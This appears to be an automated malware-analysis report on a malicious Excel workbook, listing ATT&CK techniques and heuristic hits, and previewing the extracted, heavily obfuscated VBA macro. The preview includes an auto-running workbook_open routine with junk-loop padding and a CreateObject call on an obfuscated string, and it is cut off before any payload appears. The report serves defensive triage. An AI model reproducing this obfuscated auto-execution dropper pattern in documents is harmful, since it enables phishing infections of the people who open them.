MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1059 Command and Scripting Interpreter
The critical heuristic firing for Shell() call in VBA, combined with the Workbook_Open macro, indicates that the sample is designed to execute arbitrary code upon opening. The VBA code itself is heavily obfuscated with loops and variable declarations, but the presence of these indicators strongly suggests a downloader or dropper functionality. No specific URLs or executable payloads were directly extracted, limiting further analysis.
Heuristics 6
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15132 bytes |
SHA-256: 94132390d844f2e8ee1998346307b652ced5d8ac4cfdf9e2b43e8a0f9e2982c7 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 5 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
inSGvKAdpS9KdZy.CC_lkBPHLEg1n8ZEZudr
While 14 = 7184
Dim ZjrLULPM3hAa1nXj5juCw7hsE2zDJJ As Variant
Wend
Dim Xu6Ckc3XpC1 As Integer
While 19 = 9571
Dim L8yLEuqyz467KcA9FcVKCqHOexB4qf3rJx As Variant
Wend
Dim sj43vDVUSdx As Integer
While 23 = 7610
Dim zGb4QLpo6dxiqPrvGS_MuWsZDMpQypVnZf84ZvNpBe2Nu As Variant
Wend
Dim SJdTiL_cjLaWByD As Integer
While 17 = 9753
Dim eWyNFIHJQxUTDRKOddotBJ6OcVIzReeX6JJm As Variant
Wend
Dim pmFjJ_LfM15IW7 As Integer
While 17 = 9169
Dim U_ASZhtt9Q1uQ6X3Ghh1WDhB8YBkZ_aUhmB1H1KF2Uj2GZ As Variant
Wend
Dim MPbBByW_dQe9T As Integer
While 25 = 1397
Dim AfHS9yeLn3gtPUa9Bco3gJuGW7l8cGtTIeJjrAjCl As Variant
Wend
Dim LiV5Qub5Ebwy_ As Integer
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "inSGvKAdpS9KdZy"
Dim jZls36hxIL8idJzTNZM75GAQ6sr9y7yb8DXlVsO_P_2sYWg142j1EJIbYSwILh9L As String
Function wyu_5BLgseHKitI1O_2lPSkWLEKHBVo6d_rUyr_hyDcCMrq_RDza5(Yy7bMO1hc9akW_SBAvcRGymIqBQInqMpgi2e5zvYRnoqR28TvonJ4TsjJwuK8p4vttCwFwEI_D9cH6zyC7W8BBuLyQSG_)
While 11 = 6796
Dim My_ASwIbwGtpgoWxb6LPtbCa3pbeudCDHvqJm1WJ_RmX4W As Variant
Wend
Dim O8p5zFn2Wuv As Integer
While 2 = 5789
Dim mGlTmpQDpfu8LJjgAOZymfdYcyzn5XOX5W As Variant
Wend
Dim stzUkTSMzd_ctO As Integer
While 23 = 4768
Dim hlk66GFlKzxymHPPVBxJ1wJ4ycSRn5cT As Variant
Wend
Dim EWUvna9O2Fg_ As Integer
Dim kQBAX_nRordv8niRHB2RPKnunAwhFMYI2nm3G52KgwyRn5TxIcU9T5JXmPVWL_KaRT3SAoJLIpucVTEro8Xm2
While 11 = 3439
Dim gupJ6iG7nhWuZqFaxx7PUbsNvdk4BhRsOJVCwHUDvfog As Variant
Wend
Dim jU7TgZCHOmDB As Integer
While 13 = 7396
Dim aWa7M4ENneOSDnoa2dywKNKGmicFNj9gQ_Tt4EhkiQTD_lO3tkOuwPyK As Variant
Wend
Dim JRRmY89CfrBCR4 As Integer
While 17 = 6332
Dim gv5ML33FBARjUmSLsAIHijv4JjRPgVjKjzCcyiC6QCOQSykTsR8_ As Variant
Wend
Dim IS69ABljki As Integer
Dim giNlhDDpfX6toLmUf2b2Br2Xk936Ud5vXs_itEc7kZUhnsn488tnxJTxpz_iJGTAbIT5LCkYWeOkURs1S97WsP7MXJ23E4ucES_dXrp5UTOR4raWFGNKI7QKKFeBIqRbsvdBMMb
While 7 = 5473
Dim oYF_eiyVH8MzfTdiU87gNWjRZeFdxgYU As Variant
Wend
Dim ocj1LyEu36yAn As Integer
While 19 = 799
Dim RwkcZpnlDTPywh_bTgjg2IBslUe2JmQhhnFqd_ As Variant
Wend
Dim V1urkHSBYO As Integer
While 24 = 5071
Dim QhWMbvGu21_IuZYBqOHaQ8SJsvIh3Y As Variant
Wend
Dim j6Ov3_4S_286lHQ As Integer
While 8 = 9837
Dim q9PJEkuPwvSMLdpki1aPH38gSGWJObUTJ3 As Variant
Wend
Dim Bv3Vvwxoa_h1qy As Integer
While 9 = 4572
Dim XOXDI2Hw_rz8Mj_TZ8CSb3rK_macZ89bYhu_DPJ As Variant
Wend
Dim QsMuIewiLnF As Integer
While 22 = 290
Dim hiwWUdfK9eYoVBsWgny9OHwtiNFhpPDM As Variant
Wend
Dim xRXXoBKOb2Qn2D As Integer
Set giNlhDDpfX6toLmUf2b2Br2Xk936Ud5vXs_itEc7kZUhnsn488tnxJTxpz_iJGTAbIT5LCkYWeOkURs1S97WsP7MXJ23E4ucES_dXrp5UTOR4raWFGNKI7QKKFeBIqRbsvdBMMb = CreateObject(jZls36hxIL8idJzTNZM75GAQ6sr9y7yb8DXlVsO_P_2sYWg142j1EJIbYSwILh9L)
While 20 = 5445
Dim zsZGN4Wn1YvBwFW8eqaJzClTqebhfW1G2dWWFgBHzH As Variant
Wend
Dim a9klMD2cUiLpM As Integer
W
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.